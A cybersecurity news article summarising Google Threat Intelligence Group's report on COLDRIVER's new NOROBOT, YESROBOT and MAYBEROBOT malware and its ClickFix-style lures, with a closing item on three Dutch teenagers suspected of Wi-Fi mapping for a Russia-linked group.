A Russia-linked hacking group known as COLDRIVER is showing signs of a heightened operations tempo, according to Google Threat Intelligence Group (GTIG). Since May 2025, the state-sponsored actor has rapidly refined and retooled its malware toolkit. This swift development began merely five days after the public disclosure of its previous information-stealing malware, LOSTKEYS. GTIG’s observation of this accelerated development suggests a sustained effort by the group to maintain its capabilities. While it’s unknown how long the newest malware families have been under development, GTIG has not seen a single instance of LOSTKEYS in the wild since its details were published.
The new malware collection, codenamed NOROBOT, YESROBOT, and MAYBEROBOT, represents a set of related families linked via a delivery chain. This activity marks a departure from COLDRIVER’s standard operating procedure, which typically focused on credential theft from high-profile individuals in NGOs, policy advisors, and dissidents. The new attacks leverage “ClickFix-style lures” to trick users into running malicious PowerShell commands through the Windows Run dialog, often under the guise of a fake CAPTCHA verification prompt. The earlier attack waves in January, March, and April 2025 had deployed the LOSTKEYS information stealer, but subsequent intrusions have led to the deployment of this new “ROBOT” family of malware.
The infection chain begins with an HTML ClickFix lure, dubbed COLDCOPY, which drops a DLL called NOROBOT. This DLL is then executed to drop the next-stage malware. Initial versions of this sophisticated attack distributed a Python backdoor named YESROBOT. This minimal backdoor used HTTPS to retrieve commands and only supported basic functions like file download/execution and retrieving specific documents. However, after only two observed deployments, the threat actors quickly switched to a more flexible PowerShell implant called MAYBEROBOT, which has greater capabilities, including the ability to run arbitrary commands and download payloads from a URL.
It’s believed that the COLDRIVER actors rushed to deploy the simpler YESROBOT as a “stopgap mechanism” immediately following the LOSTKEYS disclosure. They soon abandoned it in favor of the more robust MAYBEROBOT. The earliest version of NOROBOT also included a step to download a full Python 3.8 installation, a “noisy” artifact that would easily raise suspicion, which further supports the theory of a rushed initial deployment followed by rapid refinement. Google posits that the use of NOROBOT and MAYBEROBOT is likely reserved for the group’s most significant targets, who may have already been compromised via phishing, for the end goal of gathering additional intelligence from their devices.
This constant evolution—where the malware was initially simplified and later re-complicated by splitting cryptography keys—highlights the group’s concerted effort to evade detection systems for their delivery mechanism. The goal remains consistent: continued intelligence collection against high-value targets. This disclosure comes as the Netherlands’ Public Prosecution Service (OM) announced that three 17-year-old men are suspected of providing services to a foreign government. One of the suspects is alleged to have been in contact with a hacker group affiliated with the Russian government and gave instructions to the others to map Wi-Fi networks in The Hague. The information collected was shared with the client for a fee, and the OM believes it could be used for digital espionage and cyber attacks.
Reference:
